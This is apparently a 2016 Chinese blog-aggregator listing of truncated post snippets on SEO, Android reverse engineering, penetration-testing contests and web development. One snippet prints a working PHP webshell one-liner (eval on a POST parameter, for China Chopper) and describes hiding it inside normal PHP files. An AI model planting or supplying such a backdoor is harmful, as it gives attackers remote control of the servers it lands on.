logo优化:1.logo图片尽量小。2.一般情况下是作为背景放入的。2.肯定加h1标签(提权)4.搜索引擎对文本链接最友好。 <a href="#">123456</a>5.可以利用text-indent:-9999em; 隐藏文字,再display:block;转为块,再设置它的高(块元素只能继 ...
分类:
Web程序 时间:
2016-07-05 22:31:58
阅读次数:
178
必须掌握的技能1、负责安卓程序的加解密和数据传输分析、拆解、逆向等工作;
2 、逆向APK,了解运行过程;
3 、Andorid本地提权获得root权限;
4 、熟练掌握软件逆向静态分析、动态调试、代码跟踪等;
5 、熟悉Android开发,了解打包、反编译、破解流程;
6 、so破解。
我目前了解的如下:
1,加解密:这就很多了,一般都是遇到后再折腾解密,而且解密代码和秘钥一般都在代...
分类:
移动开发 时间:
2016-07-03 19:23:06
阅读次数:
291
0x01 preview
上个星期参加了某巨头厂商承办的挑战赛,比赛周期48小时,题目是成功渗透在安全宝保护下的五个通用cms靶场,其中包括论坛、商城、资源网站等
从靶场布置来看很明显是在测试安全宝对于几种不同类型cms的对攻击的防御能力。
这样的比赛模式区别于常见的CTF线上模式稍有不同,实战味道较强。常规的CTF在Web题目上面主要考察的是漏洞挖掘和利用,难点一般凸显在发现难和利...
分类:
其他好文 时间:
2016-07-02 13:20:15
阅读次数:
382
当前,互联网金融已经逐渐渗透到大众日常生活中,人们生活中几乎方方面面都与互联网金融产生着交集,大量的用户数据沉淀在网络上,因此信息安全已成为行业和大众不可忽视的问题。 互联网金融平台涉及到用户个人的身份信息、银行卡账号等不同维度的隐私数据。如果平台存在漏洞,系统被黑客恶意入侵或攻击,导致系统出现安全 ...
分类:
其他好文 时间:
2016-07-02 11:53:58
阅读次数:
186
原文出处:http://my.oschina.net/longquan/blog/155905 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen ...
分类:
Web程序 时间:
2016-06-30 14:14:50
阅读次数:
177
Description 早上好,特工W-12,你需要完成的以下的任务。 我们已经渗透到一个叫混乱与祸害的组织中,希望能掌握该组织的管理权。不幸的是,它们似乎已经准备好应对这样的事件了,它们使用了一个很复杂的设计分配管理权力,这使得我们的渗透工作非常艰难。 那家组织的管理系统被分成若干个单位,对于任意 ...
分类:
其他好文 时间:
2016-06-28 09:23:20
阅读次数:
125
这道题目我没有写出Exploit,因为编码时候里面几个细节处理出错。但对程序的逆向分析已完成,这里就学习一下别人写Exploit的思路。主要参考:绿盟科技网络攻防赛资料下载 0x01 题目要求 题目要求如下: 1.找出Exploit.exe中的漏洞。简单分析漏洞的成因,包括漏洞类型、相关的反汇编或伪 ...
分类:
其他好文 时间:
2016-06-27 20:00:16
阅读次数:
710
本文由码农网 – 小峰原创翻译,转载请看清文末的转载要求,欢迎参与我们的付费投稿计划! 网络无处不在。世界上几乎没有地方是没有被因特网所渗透的。无孔不入的网络为Web设计师和开发人员开辟了新的机遇渠道。每家企业都在争取在这个在线平台上展现头角,以便于在这场竞争中占据优势。这就是为什么设计师和开发人员 ...
分类:
Web程序 时间:
2016-06-26 01:50:56
阅读次数:
354
